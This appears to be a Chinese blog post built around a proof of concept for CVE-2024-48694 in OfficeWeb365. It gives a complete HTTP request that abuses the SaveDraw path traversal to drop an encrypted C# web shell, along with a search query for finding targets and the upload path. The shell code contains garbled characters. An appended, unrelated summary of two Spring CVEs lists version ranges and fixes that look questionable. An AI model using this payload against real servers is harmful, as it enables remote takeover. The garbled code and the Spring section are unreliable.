【CVE-2024-48694】OfficeWeb365 SaveDraw

漏洞描述

OfficeWeb365 v.8.6.1.0和v7.18.23.0中的文件上传漏洞允许远程攻击者通过pw/savedraw组件执行任意代码。

影响版本:

V8.6.1.0; V7.18.23.0

网络测绘

“OfficeWeb365”

漏洞信息

POST /PW/SaveDraw?path=../../Content/img&idx=6.ashx HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.434.18 Safari/537.36
Content-Length: 990
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

data:image/png;base64,01s34567890123456789y12345678901234567m91<%@ WebHandler Language="C#" Class="Handler" %>using System;using System.I0;using System.Reflection;using System.Text;using System.Web;using System.WebSessionState;using&System.Security.Cryptography;public class Handler : IHttpHandler,IRequiresSessionState{public void=&ProcessRequest(HttpContext context){try{string key="900bc885d7553375";byteDk=&Encoding.Default.GetBytes(key);context.Session.AddC"sky", key);StreamReader sr=new&StreamReader(contextRequest.InputStream);string line=sr.ReadLine;if(!string.IsNullOrEmpty(line)){byteDc=&Convert.FromBase64String(line);Assembly assembly=&typeof(Environment).Assembly;RijndaelManaged rm=(RijndaelManaged)&assembly.CreateInstance("System.Secur"+"ityCrypto"+"graphy.Rijnda"+"elm anaged");byte[ data=rm.CreateDecryptorCk,k)TransformFinalBlock(c,0, c.Length);Assembly.Load(data)CreateInstance("U").Equals(context);sr.clo se();}}catch {}}public bool IsReusable{get{return false;}}}}---

上传地址

/Content/img/UserDraw/drawPW6.ashx

参考:https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-48694

免责声明 

文章及相关内容仅限于合法合规的安全研究与技术学习用途。任何用户因将工具或相关信息用于其他用途而引发的法律后果或连带责任,均由使用者自行承担,作者及发布者对此不承担任何形式的法律责任或连带责任。本文仅分享来源于公开渠道的漏洞 POC,旨在促进学术研究与技术交流,不对因信息使用而导致的任何直接或间接后果、损失或风险承担责任。如本内容存在侵犯他人合法权益的情形,请立即与作者联系,作者将尽快采取必要措施予以删除并致以歉意。

CVE-2024-38816 和 CVE-2024-38819 是 Spring 官方披露的两个安全漏洞,主要涉及 Spring Framework 和 Spring Boot 组件。以下是这两个漏洞的详细信息: ### CVE-2024-38816 该漏洞与 Spring Framework 中的 `ResourceHandlerRegistry` 配置有关。当应用程序配置了静态资源处理程序(例如通过 `addResourceHandlers` 方法)时,攻击者可能通过构造特殊的 URL 路径绕过安全限制,从而访问受限的资源目录(例如 `/WEB-INF` 或 `/META-INF`)。这种访问可能导致敏感信息泄露或进一步的攻击。 漏洞影响的版本包括: - Spring Framework 6.0.x 至 6.0.11 - Spring Boot 3.0.x 至 3.2.8 修复建议: - 升级 Spring Framework 到 6.0.12 或更高版本。 - 升级 Spring Boot 到 3.2.9 或更高版本。 ### CVE-2024-38819 该漏洞涉及 Spring Boot 的 `spring-boot-starter-web` 模块中的默认安全配置问题。在某些情况下,当应用程序启用了默认的 Spring Security 配置但未正确自定义安全策略时,攻击者可能通过特定的请求绕过身份验证和授权检查,访问受保护的资源。 漏洞影响的版本包括: - Spring Boot 3.0.x 至 3.2.8 修复建议: - 升级 Spring Boot 到 3.2.9 或更高版本。 ### 验证方法 为了验证应用程序是否受这些漏洞影响,可以采取以下步骤: 1. **检查依赖版本**:确认项目中使用的 Spring Framework 和 Spring Boot 版本是否在受影响范围内。 2. **测试资源访问**:针对 CVE-2024-38816,尝试构造特殊的 URL(例如 `http://example.com/WEB-INF/config.xml`)以验证是否能够访问受限资源目录。 3. **安全扫描工具**:使用 OWASP ZAP、Burp Suite 或其他漏洞扫描工具进行检测。 ### 修复措施 1. **升级版本**:根据上述修复建议,将 Spring Framework 和 Spring Boot 升级到官方推荐的修复版本。 2. **配置安全策略**:确保 `ResourceHandlerRegistry` 的配置正确限制了对敏感目录的访问。例如: ```java @Override public void addResourceHandlers(ResourceHandlerRegistry registry) { registry.addResourceHandler("/resources/**") .addResourceLocations("/static/") .setCachePeriod(3600); } ``` 3. **启用安全配置**:对于 Spring Security,默认配置可能不足以保护所有资源。建议自定义安全策略,例如: ```java @Configuration @EnableWebSecurity public class SecurityConfig { @Bean public SecurityFilterChain filterChain(HttpSecurity http) throws Exception { http.authorizeRequests() .antMatchers("/admin/**").hasRole("ADMIN") .anyRequest().permitAll() .and() .formLogin(); return http.build(); } } ``` ### 总结 CVE-2024-38816 和 CVE-2024-38819 的修复主要依赖于版本升级和安全配置的优化。开发者应密切关注官方公告,并及时采取修复措施以防止潜在的安全风险。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值